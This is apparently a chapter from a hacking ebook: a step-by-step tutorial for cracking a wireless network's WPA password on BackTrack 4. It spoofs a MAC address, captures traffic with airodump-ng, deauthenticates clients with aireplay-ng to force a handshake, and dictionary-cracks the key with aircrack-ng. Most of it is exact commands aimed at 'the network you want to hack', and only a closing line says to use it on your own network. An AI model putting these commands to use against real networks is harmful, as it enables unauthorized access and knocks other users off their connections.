This chapter will teach you how to crack the WPA of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial. Cracking WPA isn't 100% going to work everytime. It depends on how easy their WPA password is, and how good your dictionary file is.
What you will need:
- Computer (Windows, Mac, Linux, any OS)
- Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=68b8d15896f4851257a33e8133350dd7#which_is_the_best_card_to_buy)
- Dictionary file (backtrack comes with a couple)
- Optional: Flash drive or blank DVD
- Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
- Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
- Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
- Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
- type in: airmon-ng
- Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
- type: airmon-ng stop wlan0
- type: macchanger --mac 00:11:22:33:44:55 wlan0
- type: airmon-ng start wlan0
- type: airodump-ng wlan0
- You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
- type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0
- Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
- type: aireplay-ng -0 5 -a (enter bssid here) wlan0
- type: aircrack-ng wpahack.cap -w (path to a dictionary file)
- You should now see it attempting to crack the WPA key. This could take awhile depending on how big the dictionary file is, and how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WPA on the screen :)
This won't work if you dont get a WPA handshake. The command terminal will let you know if you've received the WPA handshake or not.
Hacking WPA isn't 100% going to work every time. It will only work if their WPA password is in the dictionary file you're using. The bigger the dictionary file, the better your chances, the longer it will take.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.
